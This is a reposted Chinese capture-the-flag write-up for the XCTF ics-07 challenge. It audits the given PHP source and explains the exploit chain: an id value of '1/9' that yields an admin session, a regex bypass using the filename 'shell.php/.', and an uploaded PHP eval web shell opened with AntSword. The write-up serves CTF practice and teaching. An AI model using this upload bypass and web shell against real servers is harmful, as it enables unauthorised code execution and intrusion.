当前位置: 代码迷 >> 综合 >> [xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传)
  详细解决方案

[xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传)

热度:77   发布时间:2023-11-04 23:09:18.0

Ics -07 攻防世界

代码审计 + 正则 + 文件上传 + 登录session

源代码已经给出

<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>cetc7</title></head><body><?phpsession_start();if (!isset($_GET[page])) {
    show_source(__FILE__);die();}if (isset($_GET[page]) && $_GET[page] != 'index.php') {
    include('flag.php');}else {
    header('Location: ?page=flag.php');}?><form action="#" method="get">page : <input type="text" name="page" value="">id : <input type="text" name="id" value=""><input type="submit" name="submit" value="submit"></form><br /><a href="index.phps">view-source</a><?phpif ($_SESSION['admin']) {
    $con = $_POST['con'];$file = $_POST['file'];$filename = "backup/".$file;if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
    die("Bad file extension");}else{
    chdir('uploaded');$f = fopen($filename, 'w');fwrite($f, $con);fclose($f);}}?><?phpif (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);} else {
    $result = False;die();}if(!$result)die("<br >something wae wrong ! <br>");if($result){
    echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;}?></body>
</html>

登录session

<?phpif (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);} else {
    $result = False;die();}if(!$result)die("<br >something wae wrong ! <br>");if($result){
    echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;}?>

函数floatval获得变量浮点部分
mysql_real_escape_string对id过滤防止sql注入

*\x00*, *\n*, *\r*, *\*, *'*, *"**\x1a*

构造id 以1开头以9结尾,且数据库中有这个id

id=1/9

上传shell

过滤

(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename))

可是只能过滤掉最后的.php…
/i是不区分大小写
$代表末尾匹配
因此构造
$file=shell.php/.
con=<?phpeval(con=<?php eval(con=<?phpeval(_POST[‘cmd’]); ?>

调用蚁剑登录找到flag

chdir是切换目录的函数

chdir('uploaded');

这里把上传的文件传到uploaded/backup/下